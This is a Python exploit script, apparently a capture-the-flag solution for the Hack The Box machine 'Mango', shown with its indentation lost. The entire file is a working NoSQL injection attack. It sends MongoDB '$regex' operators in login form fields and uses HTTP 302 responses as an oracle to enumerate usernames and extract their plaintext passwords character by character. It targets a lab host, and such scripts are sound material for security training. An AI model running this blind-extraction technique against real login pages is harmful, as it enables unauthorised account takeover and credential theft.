mango.py

1. #! /usr/bin/env Python3
2.  
3. import requests
4. import string
5.  
6. url = "http://staging-order.mango.htb/"
7. headers = {"Host": "staging-order.mango.htb"}
8. cookies = {"PHPSESSID": "cupd9o9o0sk0k2jppnsjj09fns"}
9. possible_chars = list(string.ascii_letters) + list(string.digits) + ["\\"+c for c in string.punctuation+string.whitespace ]
10. def get_password(username):
11. print("Extracting password of "+username)
12. params = {"username":username, "password[$regex]":"", "login": "login"}
13. password = "^"
14. while True:
15. for c in possible_chars:
16. params["password[$regex]"] = password + c + ".*"
17. pr = requests.post(url, data=params, headers=headers, cookies=cookies, verify=False, allow_redirects=False)
18. if int(pr.status_code) == 302:
19. password += c
20. break
21. if c == possible_chars[-1]:
22. print("Found password "+password[1:].replace("\\", "")+" for username "+username)
23. return password[1:].replace("\\", "")
24.  
25. def get_usernames():
26. usernames = []
27. params = {"username[$regex]":"", "password[$regex]":".*", "login": "login"}
28. for c in possible_chars:
29. username = "^" + c
30. params["username[$regex]"] = username + ".*"
31. pr = requests.post(url, data=params, headers=headers, cookies=cookies, verify=False, allow_redirects=False)
32. if int(pr.status_code) == 302:
33. print("Found username starting with "+c)
34. while True:
35. for c2 in possible_chars:
36. params["username[$regex]"] = username + c2 + ".*"
37. if int(requests.post(url, data=params, headers=headers, cookies=cookies, verify=False, allow_redirects=False).status_code) == 302:
38. username += c2
39. print(username)
40. break
41.  
42. if c2 == possible_chars[-1]:
43. print("Found username: "+username[1:])
44. usernames.append(username[1:])
45. break
46. return usernames
47.  
48.  
49. for u in get_usernames():
50. get_password(u)